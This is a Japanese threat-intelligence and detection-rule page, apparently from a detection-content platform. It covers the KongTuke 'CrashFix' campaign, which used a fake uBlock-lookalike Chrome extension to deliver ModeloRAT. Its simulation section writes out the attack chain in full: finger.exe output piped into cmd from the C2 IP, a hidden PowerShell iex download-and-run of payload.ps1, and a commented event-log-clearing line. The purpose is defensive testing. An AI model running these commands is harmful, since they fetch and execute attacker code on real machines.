CrashFixの解剖:KongTukeの新しいおもちゃ
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
KongTukeは、uBlock Origin Liteを模倣した悪意のあるChrome拡張機能、NexShieldを配布しました。インストールされると、「CrashFix」セキュリティ警告を表示し、正当なブラウザセキュリティインシデントをシミュレートし、ブラウザをクラッシュさせて、ユーザーをクリップボードにコピーされた悪意のあるPowerShellコマンドを実行するよう強要します。このキャンペーンは、ドメインに参加しているシステムにPython RATのModeloRATを配備し、スタンドアロンホスト上で多段階のPowerShellチェーンを展開します。
調査
Huntressのアナリストは、拡張機能のコードを確認し、nexsnield.comへのコマンドアンドコントロールをリンクし、ペイロードをリバースエンジニアリングしました。彼らは、攻撃者の指示を取得するためにLOLBinとしてfinger.exeを悪用していること、及び .top ドメインを生成するDGA(ドメイン生成アルゴリズム)を観察しました。ドメイン環境については、研究者はHKCU Runキーによって維持されているRC4で暗号化されたPythonインプラントを確認しました。追加の手法として、解析防止チェック、 AMSIのバイパス、およびユーザーに迅速な完全コンプライアンスを強いるためのリソース枯渇戦術などが含まれていました。
緩和策
Chrome拡張機能IDをブロックし、人気のある広告ブロッカーを装う未知の拡張機能を監視します。nexsnield.comへのビーコン、C2 IP、およびDGAで生成されたドメインを検出します。LOLBinの使用を制限するために実行制御を適用し、特に広く使用されているソフトウェアを装った名前に注意して不審なRunキー値を警告します。
対応策
NexShield関連の拡張機能のインストールについてアラートを上げ、特定されたC2およびDGAインフラへのアウトバウンド接続と相関させます。影響を受けたホストを隔離し、拡張機能のアーティファクト、レジストリRunキー、スケジュールされたタスク、およびドロップされたファイルを収集します。ModeloRATの永続性を除去し、PowerShellステージコンポーネントを根絶し、エンドポイントを修復して検証します。
攻撃フロー
検出
PowerShellからの疑わしい.NETメソッド呼び出し(PowerShell経由)
閲覧
疑わしいCURLの使用(cmdline経由)
閲覧
短いファイル名(cmdline経由)
閲覧
珍しいフォルダで手動またはスクリプト操作が行われた可能性があります(cmdline経由)
閲覧
疑わしいPowerShell文字列(PowerShell経由)
閲覧
PowerShellからの疑わしいWindows API関数の呼び出し(PowerShell経由)
閲覧
持続性のポイントの可能性 [ASEPs – Software/NTUSERハイブ](レジストリエベント経由)
閲覧
PowerShellを使用して疑わしいディレクトリにアーカイブが抽出されました(PowerShell経由)
閲覧
疑わしいフォルダからのPythonの実行(cmdline経由)
閲覧
PowerShell難読化の指標の可能性(PowerShell経由)
閲覧
システム列挙の可能性(cmdline経由)
閲覧
PowerShellによるダウンロードまたはアップロード(cmdline経由)
閲覧
検知するためのIOC(ソースIP): CrashFixを解剖する: KongTukeの新しいオモチャ
閲覧
検知するためのIOC(HashSha256): CrashFixを解剖する: KongTukeの新しいオモチャ
閲覧
検知するためのIOC(宛先IP): CrashFixを解剖する: KongTukeの新しいオモチャ
閲覧
検知するための IOC(メール): CrashFixを解剖する: KongTukeの新しいオモチャ
閲覧
KongTuke CrashFixの悪意のあるコマンド実行を検出 [Windowsプロセス作成]
閲覧
AMSIバイパスと証拠除去のPowerShellによる検出 [Windows PowerShell]
閲覧
シミュレーション実行
前提条件: テレメトリーとベースライン事前フライトチェックが合格している必要があります。
根拠: このセクションでは、検出ルールをトリガーするよう設計された敵の手法(TTP)の正確な実行を詳述します。コマンドと叙述は識別されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目指します。
-
攻撃の説明とコマンド:
敵は最初に正当なfinger.exeバイナリを一時ディレクトリにコピーし、ct.exeにリネームしてから、階層化されたcmd /cチェーンを使用して、リモートC2サーバー(199.217.98.108)に接続する引数を与えてコピーしたバイナリを呼び出します。バイナリはペイロードをコマンドラインにストリーミングし、それが2つ目の非表示のcmdによって受信コードを実行します。その後、攻撃者はPowerShellを利用して、Invoke‑WebRequestを通じて2次ペイロードをダウンロードし、iexで即座に実行します。全てのステップはユーザー検出を回避するために最小限のUI(/min)で実行されます。1. finger.exeを%TEMP%にコピー → ct.exe 2. 実行: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. PowerShellで2次ペイロードをダウンロードし実行: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
回帰テストスクリプト: 以下のスクリプトは、Windowsのテストマシン上での攻撃チェーン全体を再現します。管理者権限のあるPowerShellセッションで実行してください。
#------------------------------------------------- # KongTuke CrashFix の悪意のあるコマンド実行 #------------------------------------------------- # 1. LOLBin(finger.exe)を%TEMP%にct.exeとして配置 $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. 悪意のあるcmdチェーンを実行(Sigmaルールに対応) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. PowerShellによるウェブダウンロードと2次ペイロードの実行 $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
クリーンアップコマンド: テストによって作成されたアーティファクトを削除し、残っているプロセスを終了します。
# コピーしたct.exeを削除 Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # テストによって開始されたcmd.exeやpowershell.exeプロセスを終了(特定のコマンドラインでフィルタリング) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # 必要に応じて、イベントログをクリアして再現性を確保します # wevlutil cl Security